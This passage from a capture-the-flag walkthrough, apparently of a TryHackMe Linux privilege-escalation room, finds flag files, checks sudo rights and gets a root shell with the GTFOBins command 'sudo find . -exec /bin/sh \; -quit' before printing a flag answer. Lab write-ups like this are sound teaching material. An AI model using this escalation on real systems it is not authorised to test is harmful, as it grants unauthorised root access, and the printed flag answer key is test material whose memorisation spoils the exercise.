![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FqnC8Jg8C7LtB6ghzAJs0%2Fimage.png?alt=media\&token=71ed919e-b40f-4aa7-9d69-48b77ea218ee)

`sudo find / -name 'flag*.txt'` - We now have the location of our flags as well.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F5hF6EJHSxHVRviZqyggF%2Fimage.png?alt=media\&token=fa52035a-b5cb-4d24-8139-76f8430babcd)

### Question 2: What is the content of the flag2.txt file?

`THM-168824782390238` -

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FzXqsAgG3xPFsMhg7t8U4%2Fimage.png?alt=media\&token=458a8422-a2da-49fe-8cee-e9a18ffd80de)

Sadly we don't have permission to the 2nd flag but lets see what sudo permissions Missy has with `sudo -l`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fsgv2U263pBSDt1rZl0WM%2Fimage.png?alt=media\&token=acd91a5e-d492-4b2e-bbbc-0a6dae68871f)

We see Missy can run `find`. As in Task 6, we can use the same GTFOBins entry.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FwvrA9aS991cOtzAuaTnz%2Fimage.png?alt=media\&token=4f94098a-7886-4f42-bb98-0528b4096d12)

`sudo find . -exec /bin/sh \; -quit`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F5Cfm2D1cCGxVwshGDP79%2Fimage.png?alt=media\&token=8c441aa2-6e33-48e7-97d3-41d59d235852)

We are now root and can cat the file for our final flag!

`cat /home/rootflag/flag2.txt`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FiVNvHlXqVbllcmZz1DDU%2Fimage.png?alt=media\&token=e24bc18c-23f9-496f-a3b3-e9c337f4a995)

## Congratulations! You have completed the Linux PrivEsc room!
